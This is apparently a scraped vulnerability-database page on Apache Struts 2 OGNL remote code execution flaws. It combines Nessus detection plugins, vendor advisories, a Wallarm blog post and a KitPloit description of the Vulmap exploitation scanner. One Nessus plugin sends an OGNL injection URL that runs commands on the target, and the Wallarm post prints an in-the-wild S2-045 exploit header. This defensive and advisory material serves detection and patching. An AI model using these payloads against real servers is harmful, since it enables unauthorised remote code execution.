script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1965\", \"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60082, 60166, 60167);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution\");\n script_summary(english:\"Attempts to double evaluate an action.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-014.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp /.do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"/${%23context['xwork.MethodAccessor.denyMethod\" +\n \"Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true),\" +\n \"(@java.lang.Runtime@getRuntime()).exec('\" +cmd+ \"').waitFor()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/(0)?\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-26T10:43:36", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a\nremote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. A\nremote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code\ninto the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "title": "Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1966"], "modified": "2018-09-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117401", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117401);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/25\");\n\n script_cve_id(\"CVE-2013-1966\");\n script_bugtraq_id(60166);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a\nremote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. A\nremote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code\ninto the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.exploit-db.com/exploits/25980\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3ab6fd3\");\n # https://cwiki.apache.org/confluence/display/WW/S2-013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0b2a9311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1966\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n \n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.14', 'fixed_version' : '2.3.14.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:02:28", "bulletinFamily": "software", "cvelist": ["CVE-2013-2248", "CVE-2013-1966", "CVE-2013-2251", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2014-01-08T00:00:00", "published": "2013-07-30T00:00:00", "id": "HUAWEI-SA-20130730-STRUTS", "href": "https://www.huawei.com/en/psirt/security-advisories/2013/hw-276819", "title": "Security Advisory-Multiple Apache Struts2 Vulnerabilities in Huawei Products", "type": "huawei", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1966"], "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-10-12T00:00:00", "published": "2013-05-22T00:00:00", "id": "E-319", "href": "", "type": "dsquare", "title": "Apache-Struts IncludeParams < 2.3.14.1 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "description": "Apache-Struts2 / OpenSymphony-Xwork RCE\n\nVulnerability Type: Remote Command Execution", "modified": "2013-10-18T00:00:00", "published": "2013-10-18T00:00:00", "id": "E-340", "href": "", "type": "dsquare", "title": "Apache-Struts IncludeParams < 2.3.14.2 RCE Linux", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T19:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "edition": 2, "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-07-18T00:00:00", "published": "2013-07-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "id": "SAINT:1D34925730D76AB12F475B2A125AC017", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-07-18T00:00:00", "published": "2013-07-18T00:00:00", "id": "SAINT:2158B27B9EAB9B393EED3784C4096BC1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2115"], "description": "Added: 07/18/2013 \nCVE: [CVE-2013-2115](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nBID: [60167](<http://www.securityfocus.com/bid/60167>) \nOSVDB: [93645](<http://www.osvdb.org/93645>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. Struts 2 versions prior to 2.3.14.2 do not properly handle the includeParams attribute in URLs. This could allow remote attackers to execute arbitrary OGNL code via a crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23142>) to Struts 2.3.14.2 or higher. \n\n### References\n\n<http://struts.apache.org/development/2.x/docs/s2-014.html> \n\n\n### Limitations\n\nThis exploit has been tested against Apache Software Foundation Struts 2.3.1.1 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP2 (DEP OptOut). \n\nThis exploit requires that the Struts Action URL be provided. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-07-18T00:00:00", "published": "2013-07-18T00:00:00", "id": "SAINT:828C60321F2ABC177EBA08F435872B1B", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/struts_url_includeparams_attribute_ognl_code_inj", "type": "saint", "title": "Apache Struts URL includeParams Attribute OGNL Code Injection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wallarmlab": [{"lastseen": "2017-05-01T13:42:41", "bulletinFamily": "blog", "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "description": "Two days ago Apache has published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that caught the first exploit for this vulnerability from the wild. And this is crazy. Like previous OGNL exploits this one is also based on the OGNL macroses to construct and call shell command via sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) has first caught the exploit on Mar 8, 03:34 am. Please look the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=[@ognl](<http://twitter.com/ognl>).OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance([@com](<http://twitter.com/com>).opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=([@org](<http://twitter.com/org>).apache.struts2.ServletActionContext@getResponse().getOutputStream())).([@org](<http://twitter.com/org>).apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately you should apply virtual patch to your WAF. It\u2019s essentially similar to the previous OGNL exploits however it\u2019s likely to not be covered by many existing WAF signatures. If using old-fashion Web Application Firewall make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nIt means that the OGNL technology are broken altogether.\n\n\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "modified": "2017-03-10T16:52:09", "published": "2017-03-09T00:15:54", "href": "https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": "wallarmlab", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2020-12-25T15:23:36", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9791", "CVE-2020-2551", "CVE-2019-6340", "CVE-2011-3923", "CVE-2018-7600", "CVE-2013-1966", "CVE-2020-14882", "CVE-2020-2883", "CVE-2018-2894", "CVE-2018-20062", "CVE-2010-1428", "CVE-2019-7238", "CVE-2017-3506", "CVE-2013-2251", "CVE-2014-4210", "CVE-2017-12629", "CVE-2020-10199", "CVE-2019-0193", "CVE-2018-7602", "CVE-2015-7501", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2017-12615", "CVE-2019-0230", "CVE-2010-1870", "CVE-2016-4437", "CVE-2017-9805", "CVE-2020-2729", "CVE-2013-2134", "CVE-2020-1938", "CVE-2019-9082", "CVE-2019-2725", "CVE-2010-0738", "CVE-2018-1000861", "CVE-2019-17558", "CVE-2017-1000353", "CVE-2016-3081", "CVE-2020-2555", "CVE-2019-2729"], "description": "[  ](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists. \n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [ Options ](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited. \n\n** Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\" **\n\n \n\n\n### Installation \n\nThe operating system must have python3, python3.7 or higher is recommended \n\n * Installation dependency \n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows \n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options \n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples \n\nTest all vulnerabilities poc mode \n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command \n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck [ http://example.com ](<http://example.com>) for struts2 vuln \n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on [ http://example.com:7001 ](<http://example.com:7001>)\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt \n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt \n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List \n\nVulmap supported vulnerabilities are as follows \n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | 